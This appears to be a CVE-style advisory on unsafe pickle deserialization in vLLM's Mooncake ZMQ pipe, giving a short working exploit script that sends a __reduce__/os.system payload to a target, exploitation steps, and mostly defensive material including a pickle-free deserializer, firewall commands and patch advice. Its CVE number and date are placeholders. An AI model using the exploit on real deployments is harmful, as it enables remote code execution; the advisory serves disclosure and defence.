vLLM, Remote Code Execution, CVE-2023-XXXX (Critical)

How the CVE Works:

The vulnerability arises in vLLM when configured with Mooncake, where unsafe deserialization of data occurs over ZMQ/TCP on all network interfaces. The `recv_tensor()` function calls `_recv_impl()`, which passes raw network bytes directly to `pickle.loads()`. This deserialization is inherently unsafe because unpickling can execute arbitrary code while loading serialized objects. Since the Mooncake pipe is exposed over the network using ZMQ over TCP and listens on all interfaces, attackers can send malicious payloads to the service. The lack of network controls or authentication further exacerbates the issue, enabling remote attackers to execute arbitrary code on distributed hosts.

DailyCVE Form:

Platform: vLLM
Version: Versions before the fix in vllm-project/vllm14228
Vulnerability: Unsafe Deserialization
Severity: Critical
Date: 2023-XX-XX

What Undercode Say:

Exploitation:

1. Exploit Code:

    import pickle
    import zmq

    context = zmq.Context()
    socket = context.socket(zmq.REQ)
    socket.connect("tcp://<target_ip>:<port>")

    class Exploit:
        # __reduce__ tells pickle to rebuild this object by calling os.system(...)
        def __reduce__(self):
            import os
            return (os.system, ('<malicious_command>',))

    payload = pickle.dumps(Exploit())
    socket.send(payload)

2. Steps to Exploit:

  • Identify the target vLLM service using Mooncake.
  • Craft a malicious payload using pickle.dumps().
  • Send the payload over ZMQ/TCP to the exposed service.
  • The payload will be deserialized, executing the embedded command.

Protection:

1. Patch: Apply the fix from `vllm-project/vllm14228`.

2. Network Controls: Restrict ZMQ/TCP to trusted networks using firewalls.

3. Authentication: Implement authentication mechanisms for ZMQ connections.

4. Code Fix: Replace `pickle.loads()` with a safer deserialization method.

    import json

    def safe_deserialize(data):
        return json.loads(data)

5. Monitoring: Monitor network traffic for unusual ZMQ/TCP activity.

6. Logging: Enable detailed logging for deserialization operations.
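
The `json.loads()` stub in the Code Fix item shows the direction but not a usable replacement: a tensor is raw bytes plus a dtype and a shape, and JSON cannot carry the bytes. The block below is an added example, not code from vLLM or Mooncake, of what a pickle-free receive path for the `_recv_impl()` step described above can look like, covering both the Code Fix and the Logging items. The frame layout (a `TNSR` marker, a length-prefixed JSON header, little-endian element bytes), the size caps and the dtype whitelist are all assumptions of this example. Nothing in the frame names a Python object or callable, so there is nothing for the receiver to execute, and every rejected frame is logged before the error is raised.

```python
import json
import logging
import math
import struct

# Added example; not vLLM's or Mooncake's wire format. Layout (assumed):
#   MAGIC | 4-byte big-endian header length | JSON header | little-endian element bytes
# The header carries only dtype, shape and nbytes, which are validated before any
# element is decoded. Pickle protocol 2+ frames begin with 0x80, so they never match.
log = logging.getLogger("tensor_pipe")

MAGIC = b"TNSR"
MAX_FRAME_BYTES = 64 * 1024 * 1024   # cap enforced before parsing anything
MAX_HEADER_BYTES = 4096
ALLOWED_DTYPES = {"float32": "f", "int64": "q", "uint8": "B"}   # dtype -> struct typecode


def reject(reason):
    """Log the reason a frame was refused (the Logging item), then fail closed."""
    log.warning("rejected frame: %s", reason)
    raise ValueError(reason)


def build_frame(header, data):
    """Assemble a frame from an already-built header dict and raw element bytes."""
    header_bytes = json.dumps(header).encode("utf-8")
    return MAGIC + struct.pack(">I", len(header_bytes)) + header_bytes + data


def serialize_tensor(values, dtype, shape):
    """Encode a flat list of numbers with its dtype and shape into one frame."""
    typecode = ALLOWED_DTYPES[dtype]
    if math.prod(shape) != len(values):
        raise ValueError("shape does not match number of values")
    data = struct.pack(f"<{len(values)}{typecode}", *values)
    return build_frame({"dtype": dtype, "shape": list(shape), "nbytes": len(data)}, data)


def safe_deserialize(frame):
    """Parse a frame into (dtype, shape, values); any anomaly is logged and raises ValueError."""
    if len(frame) > MAX_FRAME_BYTES:
        reject(f"{len(frame)} bytes exceeds cap")
    if not frame.startswith(MAGIC):
        reject(f"bad magic {frame[:4]!r}")
    if len(frame) < len(MAGIC) + 4:
        reject("truncated frame")
    (header_len,) = struct.unpack(">I", frame[4:8])
    if header_len > MAX_HEADER_BYTES or 8 + header_len > len(frame):
        reject(f"bad header length {header_len}")
    try:
        header = json.loads(frame[8:8 + header_len])
    except ValueError:
        reject("header is not valid JSON")
    if not isinstance(header, dict):
        reject("header is not an object")
    dtype, shape, nbytes = header.get("dtype"), header.get("shape"), header.get("nbytes")
    if dtype not in ALLOWED_DTYPES:
        reject(f"dtype {dtype!r} not allowed")
    if not isinstance(shape, list) or not all(isinstance(d, int) and d >= 0 for d in shape):
        reject("shape must be a list of non-negative ints")
    data = frame[8 + header_len:]
    typecode = ALLOWED_DTYPES[dtype]
    itemsize = struct.calcsize("<" + typecode)
    # Declared size, actual payload and shape must all agree before decoding.
    if nbytes != len(data) or nbytes % itemsize != 0 or math.prod(shape) * itemsize != nbytes:
        reject("declared shape/nbytes disagree with payload")
    values = list(struct.unpack(f"<{nbytes // itemsize}{typecode}", data))
    return dtype, tuple(shape), values


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    frame = serialize_tensor([1.0, 2.0, 3.0, 4.0], "float32", (2, 2))
    print(safe_deserialize(frame))
    try:
        # Constructed bytes that merely start like a pickle frame; refused on the magic check.
        safe_deserialize(b"\x80\x04" + bytes(16))
    except ValueError as exc:
        print("refused:", exc)
```

The receiver never consults the frame to decide what code to run; it only checks that the declared dtype, shape and byte count are mutually consistent and then unpacks fixed-width numbers. That is the property the pickle path lacks, and the warning log on each refusal gives the monitoring item something concrete to alert on.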

Commands:

  • Check Open Ports:
    netstat -tuln | grep <port>
    
  • Block Unauthorized Access:
    iptables -A INPUT -p tcp --dport <port> -j DROP
    
  • Update vLLM:
    pip install --upgrade vllm
    

Analytics:

  • Affected Systems: Distributed vLLM deployments using Mooncake.
  • Risk Level: Critical due to remote code execution.
  • Attack Surface: Exposed ZMQ/TCP interfaces.
  • Mitigation Difficulty: Medium (requires patching and network reconfiguration).

By following these steps, organizations can mitigate the risk posed by this critical vulnerability.

References:

Reported By: https://github.com/advisories/GHSA-x3m8-f7g5-qhm7